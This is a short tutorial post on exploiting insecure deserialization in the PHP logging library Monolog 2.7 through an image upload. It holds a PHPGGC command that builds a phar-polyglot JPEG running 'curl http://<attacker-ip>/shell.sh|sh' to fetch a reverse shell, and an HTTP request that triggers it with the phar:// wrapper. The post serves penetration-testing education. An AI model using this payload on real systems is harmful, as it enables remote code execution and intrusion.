Monolog is a PHP logging library that sends logs to files, websockets, databases and other web services integrated into several frameworks, and known for the Insecure Deserialization vulnerability in its version 2.7, which can occur in several contexts, such as caching, but today I bring an example based on image upload functionality.
Once we verify that the application uses this library in this specific version (usually through the composer.json file), we can test for insecure deserialization in an image upload route, for example. But first we need to create the gadget with the PHPGGC collection:
phpggc -pj <base image> -o shell.jpg monolog/rce2 system 'curl http://<attacker-ip>/shell.sh|sh'
In the above example, the payload involves inducing a request to an attacker-controlled server and simultaneously downloading and executing a script containing a reverse shell, but it could be any command for PoC purposes, such as id.
Once the image is uploaded, consider that the application makes an API call to check if the image was actually uploaded successfully, through the GET method and passing the name of the image (which, in this case, contains serialized data) saved in a predefined directory as a parameter. For this data to be interpreted, we can pass the phar:// schema as a prefix:
GET /api/success.php?archive=phar:///uploads/shell.jpg HTTP/1.1
Host: redacted.com
User-Agent: Mozilla/5.0
Referer: http://redacted.com/profile/avatar/upload.php
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.9
Connection: close
If the exploit was indeed successful, the attacker would be able to view the request on your HTTP server and obtain a reverse shell.
Top comments (0)